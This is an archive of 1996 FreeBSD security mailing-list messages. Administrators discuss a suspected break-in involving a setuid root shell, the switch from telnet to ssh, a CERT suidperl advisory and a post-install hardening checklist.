Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 25 Jun 1996, Jonathan M. Bresler wrote:

> jbhunt wrote:
> >
> > Yes I read the security reports as I said it hasn't been reporting any
> > unusual suid programs. No, he won't tell me I already asked of course. As
> > vince stated we are remote admins we both have to su to root so the only
> > person on the actual console is chad. As for running a script I know for
>
> could be a new one or could be a moldy old one.
>
> you have to su to root on a remote computer.
> how do you get access to the remote machine? telnet? serial line?
> encrypted? or in the clear?

	We telnet and relogin from thousands of miles away....

> > a fact that I wasn't running anything at the time. I know this guy's
> > methods for the most part so I am almost sure he has some new exploit. He
> > also claims to have one that EVERY linux box is vulnerable to of course
> > he won't tell me or give it to me.
Vince From owner-freebsd-security Wed Jun 26 13:45:06 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA10181 for security-outgoing; Wed, 26 Jun 1996 13:45:06 -0700 (PDT) Received: from dworshak.cs.uidaho.edu (dworshak.cs.uidaho.edu [129.101.100.160]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA10170 for ; Wed, 26 Jun 1996 13:45:02 -0700 (PDT) Received: from waldrog.cs.uidaho.edu (waldrog.cs.uidaho.edu [129.101.100.23]) by dworshak.cs.uidaho.edu (8.7.5/1.1) with ESMTP id NAA10284; Wed, 26 Jun 1996 13:46:35 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by waldrog.cs.uidaho.edu (8.7.5/1.0) with SMTP id NAA21644; Wed, 26 Jun 1996 13:44:58 -0700 (PDT) X-Authentication-Warning: waldrog.cs.uidaho.edu: Host localhost [127.0.0.1] didn't use HELO protocol To: -Vince- Cc: security@freebsd.org Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Tue, 25 Jun 1996 17:35:44 PDT." Date: Wed, 26 Jun 1996 13:44:57 PDT Message-ID: <21642.835821897@waldrog.cs.uidaho.edu> From: faried nawaz Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -Vince- wrote... We telnet and relogin from thousands of miles away.... use ssh. From owner-freebsd-security Wed Jun 26 13:55:23 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA11058 for security-outgoing; Wed, 26 Jun 1996 13:55:23 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA11024; Wed, 26 Jun 1996 13:55:12 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id NAA03044; Wed, 26 Jun 1996 13:55:05 -0700 (PDT) Date: Wed, 26 Jun 1996 13:55:05 -0700 (PDT) 
From: -Vince-
To: "Michael L. VanLoon -- HeadCandy.com"
cc: "Eric J. Schwertfeger" , Mark Murray , hackers@freebsd.org, security@freebsd.org, Chad Shackley , jbhunt
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <199606260511.WAA00500@MindBender.HeadCandy.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Tue, 25 Jun 1996, Michael L. VanLoon -- HeadCandy.com wrote:
> >On Tue, 25 Jun 1996, Eric J. Schwertfeger wrote:
> >> On Tue, 25 Jun 1996, -Vince- wrote:
>
> >> > Yeah, you have a point but jbhunt was watching the user as he
> >> > hacked root since he brought the file from his own machine.... so that
> >> > wasn't something the admin was tricked into doing..
>
> >> Then the important question is, how did he move the file so that it
> >> retained the setuid bit? We're already pretty sure that the program is
> >> only /bin/sh with the setuid bit turned on. So either he found a way to
> >> move the file with the bit turned on, or he found a way to turn it on,
> >> which requires root access.
>
> > It was a remote login so he had to transfer it over somehow...
>
> Well, *if* that's true, it still wouldn't be setuid root just from the
> transfer. He'd *still* have to get root some other way to make this
> binary setuid root.
>
> But if he's going to do that, why bother copying a binary over the
> network -- it would just be easier to just snag a copy of your own
> /bin/sh and mark it setuid root.

Hmmm, what happens if he tars it first and then sends it over?
Vince From owner-freebsd-security Wed Jun 26 14:01:01 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA11574 for security-outgoing; Wed, 26 Jun 1996 14:01:01 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA11567 for ; Wed, 26 Jun 1996 14:00:57 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id OAA03572; Wed, 26 Jun 1996 14:00:39 -0700 (PDT) Date: Wed, 26 Jun 1996 14:00:39 -0700 (PDT) From: -Vince- To: faried nawaz cc: security@freebsd.org, jbhunt , Chad Shackley Subject: Re: I need help on this one - please help me track this guy down! In-Reply-To: <21642.835821897@waldrog.cs.uidaho.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Wed, 26 Jun 1996, faried nawaz wrote: > -Vince- wrote... > > > We telnet and relogin from thousands of miles away.... > > use ssh. What is ssh and where can we get it? Vince From owner-freebsd-security Wed Jun 26 14:16:04 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA13072 for security-outgoing; Wed, 26 Jun 1996 14:16:04 -0700 (PDT) Received: from mom.hooked.net (root@mom.hooked.net [206.80.6.10]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA13008 for ; Wed, 26 Jun 1996 14:15:51 -0700 (PDT) Received: from also-27.ppp.hooked.net (bass-56.ppp.hooked.net [206.80.8.120]) by mom.hooked.net (8.7.4/8.7.3) with SMTP id OAA15442 for ; Wed, 26 Jun 1996 14:15:47 -0700 (PDT) Message-ID: <31C86AF7.3517@narf.castroms.moreland.k12.ca.us> Date: Wed, 19 Jun 1996 14:02:47 -0700 
From: Almost Anonymous
Organization: Manx Consulting Services
X-Mailer: Mozilla 2.02 (Win16; I)
MIME-Version: 1.0
To: security@freebsd.org
Subject: How Secure Out Of The Box?
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

I am sure this has been asked 15 million times over, but here it is again:

How secure is FreeBSD out of the box? Assuming I didn't have an account on the system, and the passwords are protected and well made (i.e. efgREG739FJFhkh could be root), how easy/hard is it to crack? We have had some attempts (and 1 successful on a linux box at the District Office) on a FreeBSD machine from a group called r00t, and I wanted to make sure that my precious little box is secure. Thanks for your time!

--matt Clark

From owner-freebsd-security Wed Jun 26 14:19:33 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA13239 for security-outgoing; Wed, 26 Jun 1996 14:19:33 -0700 (PDT)
Received: from dworshak.cs.uidaho.edu (dworshak.cs.uidaho.edu [129.101.100.160]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA13225 for ; Wed, 26 Jun 1996 14:19:29 -0700 (PDT)
Received: from waldrog.cs.uidaho.edu (waldrog.cs.uidaho.edu [129.101.100.23]) by dworshak.cs.uidaho.edu (8.7.5/1.1) with ESMTP id OAA10477; Wed, 26 Jun 1996 14:20:57 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1]) by waldrog.cs.uidaho.edu (8.7.5/1.0) with SMTP id OAA21672; Wed, 26 Jun 1996 14:19:19 -0700 (PDT)
X-Authentication-Warning: waldrog.cs.uidaho.edu: Host localhost [127.0.0.1] didn't use HELO protocol
To: -Vince-
cc: security@freebsd.org, jbhunt , Chad Shackley
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of "Wed, 26 Jun 1996 14:00:39 PDT."
Date: Wed, 26 Jun 1996 14:19:19 PDT
Message-ID: <21670.835823959@waldrog.cs.uidaho.edu>
From: faried nawaz Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -Vince- wrote... What is ssh and where can we get it? there is a port. if you don't want to use the port, it's available off ftp.cs.hut.fi:/pub/ssh/; info on http://www.cs.hut.fi/ssh/. From owner-freebsd-security Wed Jun 26 14:22:56 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA13518 for security-outgoing; Wed, 26 Jun 1996 14:22:56 -0700 (PDT) Received: from dworshak.cs.uidaho.edu (dworshak.cs.uidaho.edu [129.101.100.160]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA13511 for ; Wed, 26 Jun 1996 14:22:53 -0700 (PDT) Received: from waldrog.cs.uidaho.edu (waldrog.cs.uidaho.edu [129.101.100.23]) by dworshak.cs.uidaho.edu (8.7.5/1.1) with ESMTP id OAA10504; Wed, 26 Jun 1996 14:24:23 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by waldrog.cs.uidaho.edu (8.7.5/1.0) with SMTP id OAA21681; Wed, 26 Jun 1996 14:22:46 -0700 (PDT) X-Authentication-Warning: waldrog.cs.uidaho.edu: Host localhost [127.0.0.1] didn't use HELO protocol To: -Vince- cc: security@freebsd.org, jbhunt , Chad Shackley Subject: Re: I need help on this one - please help me track this guy down! In-reply-to: Your message of "Wed, 26 Jun 1996 14:00:39 PDT." Date: Wed, 26 Jun 1996 14:22:46 PDT Message-ID: <21679.835824166@waldrog.cs.uidaho.edu> 
From: faried nawaz Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -Vince- wrote... What is ssh and where can we get it? oops, only answered one question. ssh is secure shell. if you use rlogin or rsh or rcp, you can use ssh. it also encrypts your session from point a to point b, so you won't have problems with passwords being snooped (you can also use rsa authentication instead of straight passwords). also can do port forwarding and other fun stuff. From owner-freebsd-security Wed Jun 26 14:28:47 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA13904 for security-outgoing; Wed, 26 Jun 1996 14:28:47 -0700 (PDT) Received: from mercury.gaianet.net (root@mercury.gaianet.net [206.171.98.26]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA13891 for ; Wed, 26 Jun 1996 14:28:44 -0700 (PDT) Received: (from vince@localhost) by mercury.gaianet.net (8.7.5/8.6.12) id OAA06641; Wed, 26 Jun 1996 14:28:34 -0700 (PDT) Date: Wed, 26 Jun 1996 14:28:34 -0700 (PDT) 
From: -Vince-
To: faried nawaz
cc: security@freebsd.org, jbhunt , Chad Shackley
Subject: Re: I need help on this one - please help me track this guy down!
In-Reply-To: <21679.835824166@waldrog.cs.uidaho.edu>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Wed, 26 Jun 1996, faried nawaz wrote:
> -Vince- wrote...
>
> What is ssh and where can we get it?
>
> oops, only answered one question.
>
> ssh is secure shell. if you use rlogin or rsh or rcp, you can use ssh. it
> also encrypts your session from point a to point b, so you won't have problems
> with passwords being snooped (you can also use rsa authentication instead of
> straight passwords). also can do port forwarding and other fun stuff.

What happens if you want to use tcsh/csh as the shell?

Vince

From owner-freebsd-security Wed Jun 26 14:41:22 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA15506 for security-outgoing; Wed, 26 Jun 1996 14:41:22 -0700 (PDT)
Received: from dworshak.cs.uidaho.edu (dworshak.cs.uidaho.edu [129.101.100.160]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA15501 for ; Wed, 26 Jun 1996 14:41:16 -0700 (PDT)
Received: from waldrog.cs.uidaho.edu (waldrog.cs.uidaho.edu [129.101.100.23]) by dworshak.cs.uidaho.edu (8.7.5/1.1) with ESMTP id OAA10599; Wed, 26 Jun 1996 14:42:33 -0700 (PDT)
Received: from localhost (localhost [127.0.0.1]) by waldrog.cs.uidaho.edu (8.7.5/1.0) with SMTP id OAA21704; Wed, 26 Jun 1996 14:40:56 -0700 (PDT)
X-Authentication-Warning: waldrog.cs.uidaho.edu: Host localhost [127.0.0.1] didn't use HELO protocol
To: -Vince-
cc: security@freebsd.org, jbhunt , Chad Shackley
Subject: Re: I need help on this one - please help me track this guy down!
In-reply-to: Your message of "Wed, 26 Jun 1996 14:28:34 PDT."
Date: Wed, 26 Jun 1996 14:40:55 PDT
Message-ID: <21702.835825255@waldrog.cs.uidaho.edu>
From: faried nawaz Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk -Vince- wrote... What happens if you want to use tcsh/csh as the shell? It doesn't care what shell you use, for the most part. I think you should try the web page. From owner-freebsd-security Wed Jun 26 15:00:55 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA19758 for security-outgoing; Wed, 26 Jun 1996 15:00:55 -0700 (PDT) Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id PAA19727 for ; Wed, 26 Jun 1996 15:00:46 -0700 (PDT) Received: by gvr.win.tue.nl (8.6.12/1.53) id AAA24286; Thu, 27 Jun 1996 00:00:15 +0200 
From: guido@gvr.win.tue.nl (Guido van Rooij) Message-Id: <199606262200.AAA24286@gvr.win.tue.nl> Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd) To: taob@io.org (Brian Tao) Date: Thu, 27 Jun 1996 00:00:14 +0200 (MET DST) Cc: freebsd-security@freebsd.org In-Reply-To: from Brian Tao at "Jun 26, 96 02:38:13 pm" X-Mailer: ELM [version 2.4ME+ PL17 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Brian Tao wrote: [There is text before PGP section.] > I believe this applies to perl4 as shipped with all versions of > FreeBSD, as well as the perl5 packages/ports. Does anyone know what > the actual vulnerability is? We know. This bug was first reported by Paul Traina to CERT. Of course we're not going to get into details. -Guido From owner-freebsd-security Wed Jun 26 15:07:20 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA21061 for security-outgoing; Wed, 26 Jun 1996 15:07:20 -0700 (PDT) Received: from post.io.org (post.io.org [198.133.36.6]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA20638 for ; Wed, 26 Jun 1996 15:04:51 -0700 (PDT) Received: from zap.io.org (taob@zap.io.org [198.133.36.81]) by post.io.org (8.7.5/8.7.3) with SMTP id SAA06518; Wed, 26 Jun 1996 18:01:11 -0400 (EDT) Date: Wed, 26 Jun 1996 18:02:05 -0400 (EDT) 
From: Brian Tao To: Almost Anonymous cc: FREEBSD-SECURITY-L Subject: Re: How secure is FreeBSD 2.1 right after install? (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk This is a helpful article Cy posted a few months ago. It's a good checklist that you should go through to ensure that you have an audited and controlled security plan. -- Brian Tao (BT300, taob@io.org, taob@ican.net) Systems and Network Administrator, Internet Canada Corp. "Though this be madness, yet there is method in't" ---------- Forwarded message ---------- Date: Mon, 11 Mar 96 07:00:17 -0800 
From: Cy Schubert - BCSC Open Systems Group
Reply-To: cschuber@orca.gov.bc.ca
To: sreid@edmbbs.iceonline.com
Cc: security@FreeBSD.ORG
Subject: Re: How secure is FreeBSD 2.1 right after install?

> Is there anything I need to do to secure my system after a fresh install
> from the Walnut Creek CD?
>
> I've already disabled the r*, finger and telnet services in inetd.conf.
> I don't expect I'll need them. Is there anything else I need to worry
> about?
>
> Our local ethernet will start with two FreeBSD machines and a Cisco
> router, connected to the internet. One of the FreeBSD machines will be a
> web server (probably running Apache) and the other will be for web page
> development under X Windows.
>
> I'm concerned that X might be a potential security hole, since it uses
> TCP port 6000 to accept connections from clients... Can I close off
> remote access to the X server without having to install a firewall? I
> won't need to access the X server from the LAN. Can X be set to ignore
> the TCP port?
>
> I'm interested in anything that might be a security problem.

Here are some basic steps I would start with:

1. Install TCP/Wrapper and block all of your TCP services run out of inetd.

2. Recompile the kernel to make use of the IP Firewall code, then block TCP ports 7, 9, 13, 19, 37, 53, 67, 88, 111, 161, 162, 177, 512, 513, 514, 520, 2049, 1, 11, 15, 43, 95, 123, 144, 515, 651, 2000, 6000-6100, ypserv, yppasswdd, ypbind, mountd, and nfs. I would also block UDP ports 7, 9, 13, 19, 37, 53, 67, 88, 111, 161, 162, 177, 512, 513, 514, 520, 2049, ypserv, yppasswd, ypbind, mountd, nfs, and port 1023.

You could also block TCP services run out of inetd as well, however TCP/Wrapper does a better job of reporting and does some "PARANOID" checks against the DNS that filtering will not do. If you're really paranoid you could block those ports. On the other hand you would probably be better off blocking these ports at your router. If you're really paranoid you could do both.
Many of the commercial firewalls consist of two routers and a bastion host (firewall machine). If you allow dial-in connections much of this may be of no use since many hackers also phreak telephone lines.

3. Install Tripwire.

4. Run CRACK and COPS or Tiger on a weekly basis.

5. Route all auth.* messages to another machine and report on all anomalies.

6. Replace Sendmail 8.6.12 with Sendmail 8.7.4 and install smrsh.

7. If you don't expect to receive mail from the Internet on your FreeBSD boxes run Sendmail out of inetd and cron, then wrap it with TCP/Wrapper. If you don't need to receive mail at all don't even run sendmail out of inetd, just let sendmail queue messages from cron.

This is what comes to mind at the moment. There's a lot more you could do if you want to spend the time at it.

Regards,

Cy Schubert                  Phone:    (604)389-3827
Open Systems Support         OV/VM:    BCSC02(CSCHUBER)
BC Systems Corp.             BITNET:   CSCHUBER@BCSC02.BITNET
                             Internet: cschuber@uumail.gov.bc.ca
                                       cschuber@bcsc02.gov.bc.ca

"Quit spooling around, JES do it."

From owner-freebsd-security Wed Jun 26 15:07:59 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA21188 for security-outgoing; Wed, 26 Jun 1996 15:07:59 -0700 (PDT)
Received: from gvr.win.tue.nl (root@gvr.win.tue.nl [131.155.210.19]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id PAA21128 for ; Wed, 26 Jun 1996 15:07:44 -0700 (PDT)
Received: by gvr.win.tue.nl (8.6.12/1.53) id AAA24375; Thu, 27 Jun 1996 00:06:50 +0200
From: guido@gvr.win.tue.nl (Guido van Rooij)
Message-Id: <199606262206.AAA24375@gvr.win.tue.nl>
Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd)
To: nate@mt.sri.com (Nate Williams)
Date: Thu, 27 Jun 1996 00:06:49 +0200 (MET DST)
Cc: taob@io.org, freebsd-security@FreeBSD.ORG
In-Reply-To: <199606261914.NAA05459@rocky.mt.sri.com> from Nate Williams at "Jun 26, 96 01:14:32 pm"
X-Mailer: ELM [version 2.4ME+ PL17 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Nate Williams wrote:
> > I believe this applies to perl4 as shipped with all versions of
> > FreeBSD, as well as the perl5 packages/ports. Does anyone know what
> > the actual vulnerability is?
>
> I don't, but thanks for bringing this up. I was planning on bringing
> this in but I forgot. I just applied the suggested change to the
> version of perl in -stable and -current, so it'll be in 2.1.5.
>

We already were no longer vulnerable. However, the applied fix won't hurt.

-Guido

From owner-freebsd-security Wed Jun 26 15:27:54 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA26335 for security-outgoing; Wed, 26 Jun 1996 15:27:54 -0700 (PDT)
Received: from post.io.org (post.io.org [198.133.36.6]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA26189 for ; Wed, 26 Jun 1996 15:27:26 -0700 (PDT)
Received: from zap.io.org (taob@zap.io.org [198.133.36.81]) by post.io.org (8.7.5/8.7.3) with SMTP id SAA06682; Wed, 26 Jun 1996 18:23:13 -0400 (EDT)
Date: Wed, 26 Jun 1996 18:24:07 -0400 (EDT)
From: Brian Tao To: Guido van Rooij cc: freebsd-security@freebsd.org Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd) In-Reply-To: <199606262200.AAA24286@gvr.win.tue.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Thu, 27 Jun 1996, Guido van Rooij wrote: > > We know. This bug was first reported by Paul Traina to CERT. > Of course we're not going to get into details. Yeah, I noticed his name near the end. Since we're not vulnerable, what is the exploit? I mean, if I don't hear it from this list or CERT, it'll probably show up in Bugtraq or BoS anyway. -- Brian Tao (BT300, taob@io.org, taob@ican.net) Systems and Network Administrator, Internet Canada Corp. "Though this be madness, yet there is method in't" From owner-freebsd-security Wed Jun 26 15:28:10 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA26437 for security-outgoing; Wed, 26 Jun 1996 15:28:10 -0700 (PDT) Received: from circle.net (demeter.circle.net [207.79.160.41]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA26380 for ; Wed, 26 Jun 1996 15:27:59 -0700 (PDT) Received: (from troy@localhost) by circle.net (8.7.5/8.7.3) id SAA15943; Wed, 26 Jun 1996 18:27:59 -0400 (EDT) Date: Wed, 26 Jun 1996 18:27:58 -0400 (EDT) 
From: Troy Arie Cobb
To: security@freebsd.org
Subject: Odd permission changes
In-Reply-To: <31C86AF7.3517@narf.castroms.moreland.k12.ca.us>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

I have a strange thing that's been happening regularly now, following an incident w/ a cracker-type (who is now long gone). Now, on Fridays, around 2am, all of the owner-execute permissions on all files are removed. This has happened two weeks in a row now, I have accounting active and saw the chmod, but no one was logged in, and the daily/weekly scripts don't have any chmods in them.

I need to buy a clue, any help?

- troy

Troy Arie Cobb                                 troy@circle.net
------------------------------------------------------
| Circle Net, Inc.        | global internet access     |
| http://www.circle.net   | for western north carolina |
| info@circle.net         | and beyond...              |
| 704-254-9500            |                            |
------------------------------------------------------

From owner-freebsd-security Wed Jun 26 15:36:50 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA28836 for security-outgoing; Wed, 26 Jun 1996 15:36:50 -0700 (PDT)
Received: from orion.webspan.net (root@orion.webspan.net [206.154.70.41]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA28817 for ; Wed, 26 Jun 1996 15:36:48 -0700 (PDT)
Received: from localhost (scanner@localhost) by orion.webspan.net (8.7.5/8.6.12) with SMTP id SAA11672; Wed, 26 Jun 1996 18:36:33 -0400 (EDT)
Date: Wed, 26 Jun 1996 18:36:33 -0400 (EDT)
From: Scanner
To: Almost Anonymous
cc: security@FreeBSD.ORG
Subject: Re: How Secure Out Of The Box?
In-Reply-To: <31C86AF7.3517@narf.castroms.moreland.k12.ca.us>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Wed, 19 Jun 1996, Almost Anonymous wrote:
> I am sure this has been asked 15 million times over, but here it is again:
>
> How secure is FreeBSD out of the box? Assuming I didn't have an account on the system, and the passwords are
> protected and well made (i.e. efgREG739FJFhkh could be root), how easy/hard is it to crack? We have had some
> attempts (and 1 successful on a linux box at the District Office) on a FreeBSD machine from a group called
> r00t, and I wanted to make sure that my precious little box is secure. Thanks for your time!

r00t is a group of know-nothing script kiddies. Your linux can is not a shock. But if you implement tcp_wrappers and ipfw I would tell you to not break a sweat about r00t. Half of them don't even hack, the other half are irc lusers who hang on #hack. Bah. lame lame lame.

-- 
===================================| Webspan Inc., ISP Division.
FreeBSD 2.1.0 is available now!    | Phone: 908-367-8030 ext. 126
-----------------------------------| 500 West Kennedy Blvd., Lakewood, NJ-08701
Turning PCs into Workstations      | E-Mail: scanner@webspan.net
http://www.freebsd.org             | SysAdmin / Network Engineer / Security
===================================| Member BSDNET team!
http://www.bsdnet.org From owner-freebsd-security Wed Jun 26 15:41:24 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA29582 for security-outgoing; Wed, 26 Jun 1996 15:41:24 -0700 (PDT) Received: from orion.webspan.net (root@orion.webspan.net [206.154.70.41]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA29575 for ; Wed, 26 Jun 1996 15:41:20 -0700 (PDT) Received: from localhost (scanner@localhost) by orion.webspan.net (8.7.5/8.6.12) with SMTP id SAA11836; Wed, 26 Jun 1996 18:40:56 -0400 (EDT) Date: Wed, 26 Jun 1996 18:40:56 -0400 (EDT) 
From: Scanner To: Guido van Rooij cc: Brian Tao , freebsd-security@freebsd.org Subject: Re: CERT Advisory CA-96.12 - Vulnerability in suidperl (fwd) In-Reply-To: <199606262200.AAA24286@gvr.win.tue.nl> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Thu, 27 Jun 1996, Guido van Rooij wrote: > Brian Tao wrote: > [There is text before PGP section.] > > I believe this applies to perl4 as shipped with all versions of > > FreeBSD, as well as the perl5 packages/ports. Does anyone know what > > the actual vulnerability is? > > We know. This bug was first reported by Paul Traina to CERT. > Of course we're not going to get into details. Ok sure fine take all the fun out of it. :-) -- ===================================| Webspan Inc., ISP Division. FreeBSD 2.1.0 is available now! | Phone: 908-367-8030 ext. 126 -----------------------------------| 500 West Kennedy Blvd., Lakewood, NJ-08701 Turning PCs into Workstations | E-Mail: scanner@webspan.net http://www.freebsd.org | SysAdmin / Network Engineer / Security ===================================| Member BSDNET team! 
http://www.bsdnet.org From owner-freebsd-security Wed Jun 26 15:43:53 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA29757 for security-outgoing; Wed, 26 Jun 1996 15:43:53 -0700 (PDT) Received: from mexico.brainstorm.eu.org (root@mexico.brainstorm.eu.org [193.56.58.253]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id PAA29742 for ; Wed, 26 Jun 1996 15:43:50 -0700 (PDT) Received: from brasil.brainstorm.eu.org (brasil.brainstorm.eu.org [193.56.58.33]) by mexico.brainstorm.eu.org (8.7.5/8.7.3) with ESMTP id AAA03381; Thu, 27 Jun 1996 00:43:45 +0200 Received: (from uucp@localhost) by brasil.brainstorm.eu.org (8.6.12/8.6.12) with UUCP id AAA24890; Thu, 27 Jun 1996 00:43:25 +0200 Received: (from roberto@localhost) by keltia.freenix.fr (8.8.Alpha.5/keltia-uucp-2.8) id XAA11416; Wed, 26 Jun 1996 23:58:29 +0200 (MET DST) 
From: Ollivier Robert
Message-Id: <199606262158.XAA11416@keltia.freenix.fr>
Subject: Re: I need help on this one - please help me track this guy down!
To: vince@mercury.gaianet.net (-Vince-)
Date: Wed, 26 Jun 1996 23:58:29 +0200 (MET DST)
Cc: security@FreeBSD.ORG
In-Reply-To: from -Vince- at "Jun 25, 96 05:35:44 pm"
X-Operating-System: FreeBSD 2.2-CURRENT ctm#2111
X-Mailer: ELM [version 2.4ME+ PL22 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

It seems that -Vince- said:
> We telnet and relogin from thousands of miles away....

SSH is your only friend here. You could also use an encrypted telnet or STEL or SSL/Telnet but none comes near SSH.

-- 
Ollivier ROBERT -=- The daemon is FREE! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 2.2-CURRENT #11: Thu Jun 13 11:01:47 MET DST 1996

From owner-freebsd-security Wed Jun 26 16:11:11 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id QAA01578 for security-outgoing; Wed, 26 Jun 1996 16:11:11 -0700 (PDT)
Received: from gatekeeper.fsl.noaa.gov (gatekeeper.fsl.noaa.gov [137.75.131.181]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id QAA01573 for ; Wed, 26 Jun 1996 16:11:08 -0700 (PDT)
Received: from emu.fsl.noaa.gov (kelly@emu.fsl.noaa.gov [137.75.60.32]) by gatekeeper.fsl.noaa.gov (8.7.5/8.7.3) with ESMTP id XAA20975; Wed, 26 Jun 1996 23:11:03 GMT
Message-Id: <199606262311.XAA20975@gatekeeper.fsl.noaa.gov>
Received: by emu.fsl.noaa.gov (1.40.112.4/16.2) id AA095320693; Wed, 26 Jun 1996 17:11:33 -0600
Date: Wed, 26 Jun 1996 17:11:33 -0600
From: Sean Kelly
To: troy@circle.net
Cc: security@freebsd.org
In-Reply-To: (message from Troy Arie Cobb on Wed, 26 Jun 1996 18:27:58 -0400 (EDT))
Subject: Re: Odd permission changes
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

>>>>> "Troy" == Troy Arie Cobb writes:

Troy> I need to buy a clue, any help?

